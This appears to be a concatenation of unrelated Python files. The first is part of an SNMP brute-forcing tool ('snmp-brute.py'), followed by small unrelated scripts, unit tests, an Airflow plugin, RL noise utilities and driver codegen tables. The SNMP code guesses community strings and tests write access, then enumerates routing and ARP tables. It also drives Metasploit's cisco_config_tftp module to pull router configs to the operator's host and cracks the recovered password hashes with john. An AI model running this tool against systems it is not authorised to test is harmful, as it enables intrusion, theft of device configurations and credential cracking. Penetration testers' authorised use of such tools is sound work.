printout (('%s : %s \tVersion (%s):\t%s' % (str(addr[0]),str(addr[1]), SNMPVersion.sversion(response.version.val),response.community.val)),WHITE)
def SNMPrecv(sock):
try:
recv,addr=sock.recvfrom(65535)
response = SNMP(recv)
return response,addr
except:
raise
def SNMPsend(sock, packets, ip, port=defaults.port, community='', rate=defaults.rate):
addr = (ip, port)
for packet in packets:
i = randint(0, 2147483647)
packet.PDU.id = i
packet.community = community
sock.sendto(str(packet), addr)
sleep(1/rate)
def SNMPRequest(result,OID, value='', TimeOut=defaults.timeOut):
s = socket(AF_INET, SOCK_DGRAM)
s.settimeout(TimeOut)
response=''
r=result
version = SNMPVersion.iversion(r.version)
if value:
p = SNMP(
version=version,
PDU=SNMPset(varbindlist=[SNMPvarbind(oid=ASN1_OID(OID), value=value)])
)
else:
p = SNMP(
version=version,
PDU=SNMPget(varbindlist=[SNMPvarbind(oid=ASN1_OID(OID))])
)
SNMPsend(s,p,r.addr[0],r.addr[1],r.community)
for x in range(0, 5):
try:
response,addr=SNMPrecv(s)
break
except timeout: # if request times out retry
sleep(0.5)
continue
s.close
if not response:
raise timeout
return response
def testSNMPWrite(results,options,OID='.1.3.6.1.2.1.1.4.0'):
#Alt .1.3.6.1.2.1.1.5.0
setval='HASH(0xDEADBEF)'
for r in results:
try:
originalval=SNMPRequest(r,OID)
if originalval:
originalval=originalval[SNMPvarbind].value.val
SNMPRequest(r,OID,setval)
curval=SNMPRequest(r,OID)[SNMPvarbind].value.val
if curval == setval:
r.write=True
try:
SNMPRequest(r,OID,originalval)
except timeout:
pass
if options.verbose: printout (('\t %s (%s) (RW)' % (r.community,r.version)),GREEN)
curval=SNMPRequest(r,OID)[SNMPvarbind].value.val
if curval != originalval:
printout(('Couldn\'t restore value to: %s (OID: %s)' % (str(originalval),str(OID))),RED)
else:
if options.verbose: printout (('\t %s (%s) (R)' % (r.community,r.version)),BLUE)
else:
r.write=None
printout (('\t %s (%s) (Failed)' % (r.community,r.version)),RED)
except timeout:
r.write=None
printout (('\t %s (%s) (Failed!)' % (r.community,r.version)),RED)
continue
def generic_snmpwalk(snmpwalk_args,oids):
for key, val in oids.items():
try:
printout(('################## Enumerating %s Table using: %s (%s)'%(key,val[0],val[1])),YELLOW)
entry={}
out=os.popen('snmpwalk'+snmpwalk_args+' '+val[0]+' '+' | cut -d\'=\' -f 2').readlines()
print '\tINFO'
print '\t----\t'
for i in out:
print '\t',i.strip()
print '\n'
except KeyboardInterrupt:
pass
def enumerateSNMPWalk(result,options):
r=result
snmpwalk_args=' -c "'+r.community+'" -'+r.version+' '+str(r.addr[0])+':'+str(r.addr[1])
############################################################### Enumerate OS
if options.windows:
generic_snmpwalk(snmpwalk_args,WINDOWS_OIDS)
return
if options.linux:
generic_snmpwalk(snmpwalk_args,LINUX_OIDS)
return
if options.cisco:
generic_snmpwalk(snmpwalk_args,CISCO_OIDS)
############################################################### Enumerate CISCO Specific
############################################################### Enumerate Routes
entry={}
out=os.popen('snmpwalk'+snmpwalk_args+' '+'.1.3.6.1.2.1.4.21.1.1'+' '+'| awk \'{print $NF}\' 2>&1''').readlines()
lines = len(out)
printout('################## Enumerating Routing Table (snmpwalk)',YELLOW)
try:
for key, val in RouteOIDS.items(): #Enumerate Routes
#print '\t *',val[1], val[0]
out=os.popen('snmpwalk'+snmpwalk_args+' '+val[0]+' '+'| awk \'{print $NF}\' 2>&1').readlines()
entry[val[1]]=out
print '\tDestination\t\tNext Hop\tMask\t\t\tMetric\tInterface\tType\tProtocol\tAge'
print '\t-----------\t\t--------\t----\t\t\t------\t---------\t----\t--------\t---'
for j in range(lines):
print( '\t'+entry['Destination'][j].strip().ljust(12,' ') +
'\t\t'+entry['Next Hop'][j].strip().ljust(12,' ') +
'\t'+entry['Mask'][j].strip().ljust(12,' ') +
'\t\t'+entry['Metric'][j].strip().center(6,' ') +
'\t'+entry['Interface'][j].strip().center(10,' ') +
'\t'+entry['Route type'][j].strip().center(4,' ') +
'\t'+entry['Route protocol'][j].strip().center(8,' ') +
'\t'+entry['Route age'][j].strip().center(3,' ')
)
except KeyboardInterrupt:
pass
############################################################### Enumerate Arp
print '\n'
for key, val in ARPOIDS.items():
try:
printout(('################## Enumerating ARP Table using: %s (%s)'%(val[0],val[1])),YELLOW)
entry={}
out=os.popen('snmpwalk'+snmpwalk_args+' '+val[0]+' '+' | cut -d\'=\' -f 2 | cut -d\':\' -f 2').readlines()
lines=len(out)/3
entry['V']=out[0*lines:1*lines]
entry['MAC']=out[1*lines:2*lines]
entry['IP']=out[2*lines:3*lines]
print '\tIP\t\tMAC\t\t\tV'
print '\t--\t\t---\t\t\t--'
for j in range(lines):
print( '\t'+entry['IP'][j].strip().ljust(12,' ') +
'\t'+entry['MAC'][j].strip().ljust(18,' ') +
'\t'+entry['V'][j].strip().ljust(2,' ')
)
print '\n'
except KeyboardInterrupt:
pass
############################################################### Enumerate SYSTEM
for key, val in OIDS.items():
try:
printout(('################## Enumerating %s Table using: %s (%s)'%(key,val[0],val[1])),YELLOW)
entry={}
out=os.popen('snmpwalk'+snmpwalk_args+' '+val[0]+' '+' | cut -d\'=\' -f 2').readlines()
print '\tINFO'
print '\t----\t'
for i in out:
print '\t',i.strip()
print '\n'
except KeyboardInterrupt:
pass
############################################################### Enumerate Interfaces
for key, val in snmpstat_args.items():
try:
printout(('################## Enumerating %s Table using: %s (%s)'%(key,val[0],val[1])),YELLOW)
out=os.popen('snmpnetstat'+snmpwalk_args+' '+val[0]).readlines()
for i in out:
print '\t',i.strip()
print '\n'
except KeyboardInterrupt:
pass
def get_cisco_config(result,options):
printout(('################## Trying to get config with: %s'% result.community),YELLOW)
identified_ip=os.popen('ifconfig eth0 |grep "inet addr:" |cut -d ":" -f 2 |awk \'{ print $1 }\'').read()
if options.interactive:
Local_ip = raw_input('Enter Local IP ['+str(identified_ip).strip()+']:') or identified_ip.strip()
else:
Local_ip = identified_ip.strip()
if not (os.path.isdir("./output")):
os.popen('mkdir output')
p=Popen('msfconsole -x "use auxiliary/scanner/snmp/cisco_config_tftp; set RHOSTS '+str(result.addr[0])+'; set LHOST '+str(Local_ip)+'; set COMMUNITY '+result.community+'; set OUTPUTDIR ./output; set RETRIES 1; set RPORT '+str(result.addr[1])+'; set THREADS 5; set VERSION '+result.version.replace('v','')+'; run; exit -y" ',shell=True,stdin=PIPE,stdout=PIPE, stderr=PIPE) #>/dev/null 2>&1
print 'msfconsole -x "use auxiliary/scanner/snmp/cisco_config_tftp; set RHOSTS '+str(result.addr[0])+'; set LHOST '+str(Local_ip)+'; set COMMUNITY '+result.community+'; set OUTPUTDIR ./output; set RETRIES 1; set RPORT '+str(result.addr[1])+'; set THREADS 5; set VERSION '+result.version.replace('v','')+'; run; exit -y" '
out=[]
while p.poll() is None:
line=p.stdout.readline()
out.append(line)
print '\t',line.strip()
printout('################## Passwords Found:',YELLOW)
encrypted=[]
for i in out:
if "Password" in i:
print '\t',i.strip()
if "Encrypted" in i:
encrypted.append(i.split()[-1])
if encrypted:
print '\nCrack encrypted password(s)?'
for i in encrypted:
print '\t',i
#if (False if raw_input("(Y/n):").lower() == 'n' else True):
if not get_input("(Y/n):",'n',options):
with open('./hashes', 'a') as f:
for i in encrypted:
f.write(i+'\n')
p=Popen('john ./hashes',shell=True,stdin=PIPE,stdout=PIPE,stderr=PIPE)
while p.poll() is None:
print '\t',p.stdout.readline()
print 'Passwords Cracked:'
out=os.popen('john ./hashes --show').readlines()
for i in out:
print '\t', i.strip()
out=[]
while p.poll() is None:
line=p.stdout.readline()
out.append(line)
print '\t',line.strip()
def select_community(results,options):
default=None
try:
printout("\nIdentified Community strings",WHITE)
for l,r in enumerate(results):
if r.write==True:
printout ('\t%s) %s %s (%s)(RW)'%(l,str(r.addr[0]).ljust(15,' '),str(r.community),str(r.version)),GREEN)
default=l
elif r.write==False:
printout ('\t%s) %s %s (%s)(RO)'%(l,str(r.addr[0]).ljust(15,' '),str(r.community),str(r.version)),BLUE)
else:
printout ('\t%s) %s %s (%s)'%(l,str(r.addr[0]).ljust(15,' '),str(r.community),str(r.version)),RED)
if default is None:
default = l
if not options.enum:
return
if options.interactive:
selection=raw_input("Select Community to Enumerate ["+str(default)+"]:")
if not selection:
selection=default
else:
selection=default
try:
return results[int(selection)]
except:
return results[l]
except KeyboardInterrupt:
exit(0)
def SNMPenumeration(result,options):
getcisco=defaults.getcisco
try:
printout (("\nEnumerating with READ-WRITE Community string: %s (%s)" % (result.community,result.version)),YELLOW)
enumerateSNMPWalk(result,options)
if options.windows or options.linux:
if not get_input("Get Cisco Config (y/N):",'y',options):
getcisco=False
if getcisco:
get_cisco_config(result,options)
except KeyboardInterrupt:
print '\n'
return
def password_brutefore(options, communities, ips):
s = socket(AF_INET, SOCK_DGRAM)
s.settimeout(options.timeOut)
results=[]
#Start the listener
T = threading.Thread(name='listener', target=listener, args=(s,results,))
T.start()
# Craft SNMP's for both versions
p1 = SNMP(
version=SNMPVersion.iversion('v1'),
PDU=SNMPget(varbindlist=[SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1.1.0'))])
)
p2c = SNMP(
version=SNMPVersion.iversion('v2c'),
PDU=SNMPget(varbindlist=[SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1.1.0'))])
)
packets = [p1, p2c]
#We try each community string
for i,community in enumerate(communities):
#sys.stdout.write('\r{0}'.format('.' * i))
#sys.stdout.flush()
for ip in ips:
SNMPsend(s, packets, ip, options.port, community.rstrip(), options.rate)
#We read from STDIN if necessary
if options.stdin:
while True:
try:
try:
community=raw_input().strip('\n')
for ip in ips:
SNMPsend(s, packets, ip, options.port, community, options.rate)
except EOFError:
break
except KeyboardInterrupt:
break
try:
print "Waiting for late packets (CTRL+C to stop)"
sleep(options.timeOut+options.delay) #Waiting in case of late response
except KeyboardInterrupt:
pass
T._Thread__stop()
s.close
#We remove any duplicates. This relies on the __equal__
newlist = []
for i in results:
if i not in newlist:
newlist.append(i)
return newlist
def get_input(string,non_default_option,options):
#(True if raw_input("Enumerate with different community? (Y/n):").lower() == 'n' else False)
if options.interactive:
if raw_input(string).lower() == non_default_option:
return True
else:
return False
else:
print string
return False
def main():
parser = optparse.OptionParser(formatter=optparse.TitledHelpFormatter())
parser.set_usage("python snmp-brute.py -t <IP> -f <DICTIONARY>")
#parser.add_option('-h','--help', help='Show this help message and exit', action=parser.print_help())
parser.add_option('-f','--file', help='Dictionary file', dest='dictionary', action='store')
parser.add_option('-t','--target', help='Host IP', dest='ip', action='store')
parser.add_option('-p','--port', help='SNMP port', dest='port', action='store', type='int',default=defaults.port)
groupAlt = optparse.OptionGroup(parser, "Alternative Options")
groupAlt.add_option('-s','--stdin', help='Read communities from stdin', dest='stdin', action='store_true',default=False)
groupAlt.add_option('-c','--community', help='Single Community String to use', dest='community', action='store')
groupAlt.add_option('--sploitego', help='Sploitego\'s bruteforce method', dest='sploitego', action='store_true',default=False)
groupAuto = optparse.OptionGroup(parser, "Automation")
groupAuto.add_option('-b','--bruteonly', help='Do not try to enumerate - only bruteforce', dest='enum', action='store_false',default=True)
groupAuto.add_option('-a','--auto', help='Non Interactive Mode', dest='interactive', action='store_false',default=True)
groupAuto.add_option('--no-colours', help='No colour output', dest='colour', action='store_false',default=True)
groupAdvanced = optparse.OptionGroup(parser, "Advanced")
groupAdvanced.add_option('-r','--rate', help='Send rate', dest='rate', action='store',type='float', default=defaults.rate)
groupAdvanced.add_option('--timeout', help='Wait time for UDP response (in seconds)', dest='timeOut', action='store', type='float' ,default=defaults.timeOut)
groupAdvanced.add_option('--delay', help='Wait time after all packets are send (in seconds)', dest='delay', action='store', type='float' ,default=defaults.delay)
groupAdvanced.add_option('--iplist', help='IP list file', dest='lfile', action='store')
groupAdvanced.add_option('-v','--verbose', help='Verbose output', dest='verbose', action='store_true',default=False)
groupOS = optparse.OptionGroup(parser, "Operating Systems")
groupOS.add_option('--windows', help='Enumerate Windows OIDs (snmpenum.pl)', dest='windows', action='store_true',default=False)
groupOS.add_option('--linux', help='Enumerate Linux OIDs (snmpenum.pl)', dest='linux', action='store_true',default=False)
groupOS.add_option('--cisco', help='Append extra Cisco OIDs (snmpenum.pl)', dest='cisco', action='store_true',default=False)
parser.add_option_group(groupAdvanced)
parser.add_option_group(groupAuto)
parser.add_option_group(groupOS)
parser.add_option_group(groupAlt)
(options, arguments) = parser.parse_args()
communities=[]
ips=[]
banner(options.colour) #For SPARTA!!!
if not options.ip and not options.lfile:
#Can't continue without target
parser.print_help()
exit(0)
else:
# Create the list of targets
if options.lfile:
try:
with open(options.lfile) as t:
ips = t.read().splitlines() #Potential DoS
except:
print "Could not open targets file: " + options.lfile
exit(0)
else:
ips.append(options.ip)
if not options.colour:
defaults.colour=False
# Create the list of communities
if options.dictionary: # Read from file
with open(options.dictionary) as f:
communities=f.read().splitlines() #Potential DoS
elif options.community: # Single community
communities.append(options.community)
elif options.stdin: # Read from input
communities=[]
else: #if not options.community and not options.dictionary and not options.stdin:
communities=default_communities
#We ensure that default communities are included
#if 'public' not in communities:
# communities.append('public')
#if 'private' not in communities:
# communities.append('private')
if options.stdin:
options.interactive=False
results=[]
if options.stdin:
print >> sys.stderr, "Reading input for community strings ..."
else:
print >> sys.stderr, "Trying %d community strings ..." % len(communities)
if options.sploitego: #sploitego method of bruteforce
if ips:
for ip in ips:
for version in ['v1', 'v2c']:
bf = SNMPBruteForcer(ip, options.port, version, options.timeOut,options.rate)
result=bf.guess(communities)
for i in result:
r=SNMPResults()
r.addr=(ip,options.port)
r.version=version
r.community=i
results.append(r)
print ip, version+'\t',result
else:
parser.print_help()
else:
results = password_brutefore(options, communities, ips)
#We identify whether the community strings are read or write
if results:
printout("\nTrying identified strings for READ-WRITE ...",WHITE)
testSNMPWrite(results,options)
else:
printout("\nNo Community strings found",RED)
exit(0)
#We attempt to enumerate the router
while options.enum:
SNMPenumeration(select_community(results,options),options)
#if (True if raw_input("Enumerate with different community? (Y/n):").lower() == 'n' else False):
if get_input("Enumerate with different community? (y/N):",'y',options):
continue
else:
break
if not options.enum:
select_community(results,options)
print "Finished!"
if __name__ == "__main__":
main()
|
python
|
nasc = int(input('Ano de nascimento: '))
idade = 2018 - nasc
if idade <= 9:
print('Categoria: Mirim')
elif idade <= 14:
print('Categoria: Infantil')
elif idade <= 19:
print('Categoria: Júnior')
elif idade <= 20:
print('Categoria: Sênior')
elif idade >= 21:
print('Categoria: Master')
|
python
|
#!/usr/bin/env python
# coding:utf-8
"""
Test functionality of Service elements.
"""
# -- standard library ---------------------------------------------------------
from cgi import parse_header, FieldStorage
from threading import Thread
import unittest
import tempfile
import zipfile
import socket
import json
import sys
import os
# -- Third-party imports ------------------------------------------------------
import requests
# --Modules to test -----------------------------------------------------------
from VestaService import (Document, Message, RemoteAccess,
annotations_dispatcher)
from VestaService.service_exceptions import DownloadError
if sys.version_info >= (3, 1):
from http.server import BaseHTTPRequestHandler, HTTPServer
else:
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
CURRENT_DIR = os.path.dirname(__file__)
TEST_DOC_DURATION = 19.9375
PROCESS_DURATION = 2.0 # Processing time in seconds.
class MockServerRequestHandler(BaseHTTPRequestHandler):
"""
Mock server to test the submit_annotation function
"""
def do_POST(self):
'''
Process an HTTP POST request and return a response with the length of
the data received. If the data is zipped, unzip it on the disk and
check the length of the unzipped data.
'''
ctype, pdict = parse_header(self.headers['content-type'])
# Handling unzipped data
if ctype == "application/json":
content_len = int(self.headers.get("Content-Length"))
post_body = self.rfile.read(content_len)
body = json.loads(post_body.decode('utf-8'))
if body["data"] is not None:
self.send_response(requests.codes.ok)
self.send_header("Content-Type", "application/json")
self.end_headers()
self.wfile.write('{{"Content-Length" : {} }}'.
format(content_len).encode('utf-8'))
else:
self.send_response(requests.codes.bad)
self.end_headers()
# Handling zipped data
elif ctype == "multipart/form-data":
form = FieldStorage(
fp=self.rfile,
headers=self.headers,
environ={'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': self.headers['Content-Type'],
})
filename = form['file'].filename
if filename != "annotations.zip":
self.send_response(requests.codes.bad)
else:
data = form['file'].file.read()
temp_file_path = os.path.join(tempfile.gettempdir(),
"test.zip")
with open(temp_file_path, "wb") as zip_file:
zip_file.write(data)
with zipfile.ZipFile(temp_file_path, "r") as zippy:
infolist = zippy.infolist()
if len(infolist) != 1:
self.send_response(requests.codes.bad)
else:
self.send_response(requests.codes.ok)
self.send_header("Content-Type", "application/json")
self.end_headers()
self.wfile.write('{{"Content-Length" : {} }}'.
format(infolist[0].file_size).
encode('utf-8'))
os.remove(temp_file_path)
def get_free_port():
s = socket.socket(socket.AF_INET, type=socket.SOCK_STREAM)
s.bind(('localhost', 0))
address, port = s.getsockname()
s.close()
return port
# -- fixtures ----------------------------------------------------------------
class TestUtilities(unittest.TestCase):
"""
Test utility modules.
"""
def setUp(self):
self.mock_server_port = get_free_port()
self.mock_server = HTTPServer(('localhost', self.mock_server_port),
MockServerRequestHandler)
# Start running mock server in a separate thread.
# Daemon threads automatically shut down when the main process exits.
self.mock_server_thread = Thread(target=self.mock_server.serve_forever)
self.mock_server_thread.setDaemon(True)
self.mock_server_thread.start()
def tearDown(self):
self.mock_server.server_close()
def test_document_creation(self):
"""
Check structure of Document instance.
"""
some_url = 'http://www.crim.ca'
some_path = __file__
doc = Document.Document(url=some_url, path=some_path)
self.assertEqual(doc.url, some_url)
self.assertEqual(doc.local_path, some_path)
def test_blank_message_creation(self):
"""
Validate message contents after creating blank message.
"""
msg = Message.request_message_factory()
self.assertTrue('request_time' in msg)
self.assertTrue('service' in msg)
self.assertTrue('annotation_service' in msg)
def test_download(self):
"""
Check download function
"""
MAX_TRY = 1
# Testing the error returned when the respons code != 200
doc_msg = {"url": "http://www.crim.ca/page_inconnue"}
with self.assertRaises(DownloadError):
doc = RemoteAccess.download(doc_msg, max_try=MAX_TRY)
# Testing the size of the data written on the disk
doc_msg = {"url": "https://httpbin.org/stream-bytes/1024"}
doc = RemoteAccess.download(doc_msg, max_try=MAX_TRY)
self.assertEqual(os.stat(doc.local_path).st_size, 1024)
RemoteAccess.cleanup(doc)
doc_msg = {"url": "https://httpbin.org/bytes/1024"}
doc = RemoteAccess.download(doc_msg, max_try=MAX_TRY)
self.assertEqual(os.stat(doc.local_path).st_size, 1024)
RemoteAccess.cleanup(doc)
def test_submit_annotations(self):
"""
Check the annotations_dispatcher.submit_annotation function
:return:
"""
post_url = "http://localhost:{}".format(self.mock_server_port)
annotations = [{"annotation": "annotation"}]
# Sending the annotations zipped
result = annotations_dispatcher.submit_annotations(post_url,
annotations, True)
self.assertEqual(result.status_code, 200)
zip_resp = json.loads(result.content.decode('utf-8'))
# Sending the annotations unzipped
result = annotations_dispatcher.submit_annotations(post_url,
annotations, False)
self.assertEqual(result.status_code, 200)
no_zip_resp = json.loads(result.content.decode('utf-8'))
# Checking that the length of the data sent by both method is the same
self.assertEqual(zip_resp["Content-Length"],
no_zip_resp["Content-Length"])
if __name__ == '__main__':
unittest.main()
|
python
|
import unittest
from PySide2.QtWidgets import *
from qtimgren.main_window import MainWindow
from unittest.mock import Mock, patch
import qtimgren.main_window
import qtimgren.about
import qtimgren.profile
import qtimgren.profiles
class TestMainWindow(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
cls.app = QApplication.instance()
if cls.app is None:
cls.app = QApplication()
def setUp(self) -> None:
self.window = MainWindow()
self.window.show()
def tearDown(self) -> None:
self.window.close()
def test_about(self):
about = Mock(qtimgren.about.About)
about.exec_ = Mock()
about.exec = about.exec_
with patch.object(qtimgren.main_window, 'About') as About:
About.return_value = about
action = self.window.action_about
action.triggered.emit()
about.exec_.assert_called_once_with()
def test_about_qt(self):
with patch.object(qtimgren.main_window, 'QApplication') as qApp:
action = self.window.action_about_qt
action.triggered.emit()
qApp.aboutQt.assert_called_once_with()
def test_close(self):
self.assertTrue(self.window.isVisible())
action = self.window.action_quit
action.triggered.emit()
self.assertFalse(self.window.isVisible())
def test_new_profile(self):
dialog = Mock(qtimgren.profile.ProfileDialog)
with patch.object(self.window, 'profile_manager') as pm, \
patch.object(qtimgren.main_window, 'ProfileDialog') as Dialog:
pm.names.return_value = ['a', 'b']
Dialog.return_value = dialog
dialog.exec_ = Mock()
dialog.exec = dialog.exec_
dialog.exec_.return_value = 1
action = self.window.action_new_profile
action.triggered.emit()
Dialog.assert_called_once_with(self.window, names=['a', 'b'])
dialog.exec_.assert_called_once_with()
pm.add_from_dialog.assert_called_once_with(dialog)
def test_manage_profiles(self):
dialog = Mock(qtimgren.profiles.ProfilesDialog)
with patch.object(self.window, 'profile_manager') as pm, \
patch.object(qtimgren.main_window, 'ProfilesDialog') as Dialog:
Dialog.return_value = dialog
dialog.exec_.return_value = 1
dialog.model = Mock()
dialog.exec = Mock()
dialog.exec_ = dialog.exec
action = self.window.action_manage_profiles
action.triggered.emit()
Dialog.assert_called_once_with(pm.profiles, self.window)
dialog.exec.assert_called_once_with()
pm.reset_profiles.assert_called_once_with(dialog.model.profiles)
if __name__ == '__main__':
unittest.main()
|
python
|
from airflow.plugins_manager import AirflowPlugin
from freshdesk_plugin.operators.freshdesk_to_s3_operator import FreshdeskToS3Operator
class freshdesk_plugin(AirflowPlugin):
name = "freskdesk_plugin"
operators = [FreshdeskToS3Operator]
hooks = []
# Leave in for explicitness
executors = []
macros = []
admin_views = []
flask_blueprints = []
menu_links = []
|
python
|
import numpy as np
import random
import matplotlib.pyplot as plt
from collections import deque
class UniformNoise(object):
def __init__(self, action_space, initial_exploration = 0.99, final_exploration = 0.05, decay_rate = 0.999):
self.action_dim = action_space.shape[0] # Requires Space with (10,) shape!
self.low = action_space.low
self.high = action_space.high
self.distance = abs(self.low - self.high)
self.initial_exploration = initial_exploration
self.final_exploration = final_exploration
self.decay_rate = decay_rate
def reset(self):
self.state = np.ones(self.action_dim)
def get_action(self, action, step = 0):
decay = self.decay_rate ** step
exploration_probabilty = decay*self.initial_exploration + (1-decay)*self.final_exploration
# Exploration Probability
explore_yes = np.random.binomial(1,exploration_probabilty)
# Unnormalized Uniform Numbers
noise_list = np.random.uniform(self.low, self.high ,size=self.action_dim) #used self.low/10 before
#Renormalize
#sum_noise = noise_list.sum()
noisy_action = explore_yes * noise_list + (1 - explore_yes) * action
return noisy_action
# Ornstein-Ulhenbeck Process, Taken from #https://github.com/vitchyr/rlkit/blob/master/rlkit/exploration_strategies/ou_strategy.py
class OUNoise(object):
def __init__(self, action_space, mu=0.0, theta=0.15, max_sigma=0.3, min_sigma=0.3, decay_period=100000):
self.mu = mu
self.theta = theta
self.sigma = max_sigma
self.max_sigma = max_sigma
self.min_sigma = min_sigma
self.decay_period = decay_period
#BiddingMarket_energy_Environment Params
self.action_dim = action_space.shape[0]
self.low = action_space.low
self.high = action_space.high
# only relevant for Discrete action_space
if len(self.low) > 3:
self.low = 0
self.high = 1
self.reset()
def reset(self):
self.state = np.ones(self.action_dim) * self.mu
def evolve_state(self):
x = self.state
dx = self.theta * (self.mu - x) + self.sigma * np.random.randn(self.action_dim)
self.state = x + dx
return self.state
def get_action(self, action, t=0):
ou_state = self.evolve_state()
self.sigma = self.max_sigma - (self.max_sigma - self.min_sigma) * min(1.0, t / self.decay_period)
return np.clip(action + ou_state, self.low, self.high)
class Memory:
def __init__(self, max_size):
self.max_size = max_size
self.buffer = deque(maxlen=max_size)
def push(self, state, action, reward, next_state, done):
experience = (state, action, reward, next_state, done)
self.buffer.append(experience)
def sample(self, batch_size):
state_batch = []
action_batch = []
reward_batch = []
next_state_batch = []
done_batch = []
batch = random.sample(self.buffer, batch_size)
for experience in batch:
state, action, reward, next_state, done = experience
state_batch.append(state)
action_batch.append(action)
reward_batch.append(reward)
next_state_batch.append(next_state)
done_batch.append(done)
return state_batch, action_batch, reward_batch, next_state_batch, done_batch
def __len__(self):
return len(self.buffer)
class GaussianNoise(object):
def __init__(self, action_space, mu = 0.0, sigma = 0.1, regulation_coef = 1, decay_rate = 0):
self.action_dim = action_space.shape[0]
self.low = action_space.low
self.high = action_space.high
# only relevant for Discrete action_space
if len(self.low) > 3:
self.low = 0
self.high = 1
self.distance = abs(self.low - self.high)
self.decay_rate = decay_rate
self.regulation_coef = regulation_coef
self.mu = mu
self.sigma = sigma
self.reset()
def reset(self):
self.state = np.ones(self.action_dim) * self.mu
def get_action(self, action, step = 0):
noise_list = np.random.normal(self.mu, self.sigma, self.action_dim)* ((1 - self.decay_rate)**step) * self.regulation_coef
if ((noise_list)**2)**0.5 < 0.01:
noise_list = np.random.normal(0,0.01,self.action_dim)
noisy_action = np.clip(action + noise_list, self.low, self.high)
return noisy_action
def plot_run_outcome(data, number_of_agents, bid_limit, NE, episodes, run, curves = 'both',
title = 'Bidding Game',rescale=[1,1,1], moving_window = 9):
'''
Plots actions or rewards or both (curves ='actons','rewards'or'both')
Reads out nessecary data from dictionary (structured like in 'main')
possible to display bid limit and Nash Equilibrium (NE) threshold (NE can also be 'none')
actions, rewards and bid_limit can be recaled for reprenstatiom (rescale[param for actions, param, for rewards, param for bid_limit])
also takes the moving medain of a predefined window (default = 10) for smoothing outputted lines
'''
med_actions, med_rewards = moving_median_rewards_actions(data,run,episodes, moving_window)
# rescale data
med_actions = med_actions*rescale[0]
med_rewards = med_rewards*rescale[1]
bid_limit = bid_limit*rescale[2]
plt.plot([bid_limit]*episodes, color='grey',label = 'Bid Limit' , lw =1)
if NE != 'none':
plt.plot([NE]*episodes, color='C0', label = 'Nash Equilibrium', lw =1)
for i in range(number_of_agents):
if curves == 'actions':
plt.plot(med_actions[1:,i], 'C{}'.format(i+1), label = 'Bids Agent{}'.format(i), lw =1, linestyle = '--') # displaying actions
plt.ylabel('Action')
elif curves == 'rewards':
plt.plot(med_rewards[1:,i], 'C{}'.format(i+1), label = 'Rewards Agent{}'.fromat(i), lw =1) # displaying rewards
plt.ylabel('Reward')
else:
plt.plot(med_actions[1:,i], 'C{}'.format(i+1), label = 'Bids Agent{}'.format(i), lw =1, linestyle = '--')
plt.plot(med_rewards[1:,i], 'C{}'.format(i+1), label = 'Rewards Agent{}'.format(i), lw =1) # displaying rewards
plt.ylabel('Reward/Action')
plt.xlabel('Episode')
plt.legend(loc=4, prop={'size': 7})
plt.title('{}'.format(title))
plt.plot()
def moving_median_rewards_actions(data,run, episodes=15000, n=9):
'''
reads actions and rewards for all episodes in a specific run from dictionary
and further calculates the moving median for a specified period "n"
'''
# get data from dictionary
actions =[data[run][i]['actions'] for i in range(episodes)]
rewards =[data[run][i]['rewards'] for i in range(episodes)]
actions= np.squeeze(np.asarray(actions))
rewards= np.squeeze(np.asarray(rewards))
med_rewards = []
med_actions = []
#moving median of n_th step (takes median from n rows and outputs an array of the same length as the input)
for i in range(episodes):
temp_actions =np.median(actions[i:n], axis=0)
temp_rewards =np.median(rewards[i:n], axis=0)
med_actions.append(temp_actions)
med_rewards.append(temp_rewards)
n += 1
recompiled_actions = np.asarray(med_actions)
recomplied_rewards = np.asarray(med_rewards)
return recompiled_actions, recomplied_rewards
|
python
|
# These dictionaries are applied to the generated attributes dictionary at build time
# Any changes to the API should be made here. attributes.py is code generated
# We are not code genning attributes that have been marked as obsolete prior to the initial
# Python API bindings release
attributes_codegen_method = {
1150001: { "codegen_method": "no" }, # ID_QUERY_RESPONSE
1150031: { "codegen_method": "no" }, # SAMPLE_DELAY_MODE
1050401: { "codegen_method": "no" }, # GROUP_CAPABILITIES - IVI Attribute - #824
1050021: { "codegen_method": "no" }, # INTERCHANGE_CHECK - IVI Attribute - #824
1050002: { "codegen_method": "no" }, # RANGE_CHECK - IVI Attribute - #824
1050006: { "codegen_method": "no" }, # RECORD_COERCIONS - IVI Attribute - #824
1050515: { "codegen_method": "no" }, # SPECIFIC_DRIVER_CLASS_SPEC_MAJOR_VERSION - IVI Attribute - #824
1050516: { "codegen_method": "no" }, # SPECIFIC_DRIVER_CLASS_SPEC_MINOR_VERSION - IVI Attribute - #824
1050302: { "codegen_method": "no" }, # SPECIFIC_PREFIX - IVI Attribute - #824
1050003: { "codegen_method": "no" }, # QUERY_INSTR_STATUS - IVI Attribute - #824
1050101: { "codegen_method": "no" }, # PRIMARY_ERROR - IVI Attribute - #824
1050102: { "codegen_method": "no" }, # SECONDARY_ERROR - IVI Attribute - #824
1050103: { "codegen_method": "no" }, # ERROR_ELABORATION - IVI Attribute - #824
1050501: { "codegen_method": "no" }, # ENGINE_MAJOR_VERSION - IVI Attribute - #824
1050502: { "codegen_method": "no" }, # ENGINE_MINOR_VERSION - IVI Attribute - #824
1050553: { "codegen_method": "no" }, # ENGINE_REVISION - IVI Attribute - #824
1050004: { "codegen_method": "no" }, # CACHE - IVI Attribute - #824
1150034: { "codegen_method": "no" }, # LATENCY - EOL hardware only - #875
1150003: { "codegen_method": "no" }, # SHUNT_VALUE - EOL hardware only - #875
1150002: { "codegen_method": "no" }, # MEAS_DEST_SLOPE - EOL hardware only - #875
1150010: { "codegen_method": "no" }, # SAMPLE_TRIGGER_SLOPE - EOL hardware only - #875
1250334: { "codegen_method": "no" }, # TRIGGER_SLOPE - EOL hardware only - #875
}
attributes_converters = {
1150028: { 'attribute_class': 'AttributeViReal64TimeDeltaSeconds',
'type_in_documentation': 'float in seconds or datetime.timedelta', }, # SETTLE_TIME
1250005: { 'attribute_class': 'AttributeViReal64TimeDeltaSeconds',
'type_in_documentation': 'float in seconds or datetime.timedelta', }, # TRIGGER_DELAY
1250303: { 'attribute_class': 'AttributeViReal64TimeDeltaSeconds',
'type_in_documentation': 'float in seconds or datetime.timedelta', }, # SAMPLE_INTERVAL
}
attributes_name = {
1150044: { 'name': 'FREQ_VOLTAGE_AUTO_RANGE', }, # extracted metadata has incorrect name #874, internal NI CAR 699520
}
